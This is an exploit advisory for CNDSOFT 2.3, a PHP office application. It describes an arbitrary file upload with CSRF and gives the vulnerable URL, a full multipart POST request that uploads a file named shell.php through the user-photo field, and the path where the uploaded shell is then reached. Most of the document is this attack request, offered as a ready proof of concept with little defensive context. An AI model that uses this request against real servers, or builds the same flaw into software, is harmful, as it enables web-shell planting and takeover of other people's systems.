*========================================================================================================= # Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php) # Author: Besim # Google Dork: - # Date: 19/10/2016 # Type: webapps # Platform : PHP # Vendor Homepage: - # Software Link: http://www.phpexplorer.com/Goster/1227 # Version: 2.3 *========================================================================================================= Vulnerable URL and Parameter ======================================== Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla Vulnerable Parameter = &mesaj_baslik TECHNICAL DETAILS & POC & POST DATA ======================================== POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site_name/ofis/index.php?is=kullanici_tanimla aa Content-Type: multipart/form-data; boundary=---------------------------5035863528338 Content-Length: 1037 -----------------------------5035863528338 Content-Disposition: form-data; name="utf8" a -----------------------------5035863528338 Content-Disposition: form-data; name="authenticity_token" CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I= -----------------------------5035863528338 Content-Disposition: form-data; name="kullanici_adi" meryem -----------------------------5035863528338 Content-Disposition: form-data; name="kullanici_sifresi" meryem -----------------------------5035863528338 Content-Disposition: form-data; name="kullanici_mail_adresi" m@yop.com -----------------------------5035863528338 Content-Disposition: form-data; name="MAX_FILE_SIZE" 30000 -----------------------------5035863528338 Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php" Content-Type: application/octet-stream ** -----------------------------5035863528338 Content-Disposition: form-data; name="personel_maasi" 5200 -----------------------------5035863528338-- *CSRF PoC - File Upload (Shell.php)* ========================================
======================================== *Access File : *http://www.site_name/path/personel_resimleri/shell.php RISK ======================================== Attacker can arbitrary file upload. -- Besim ALTINOK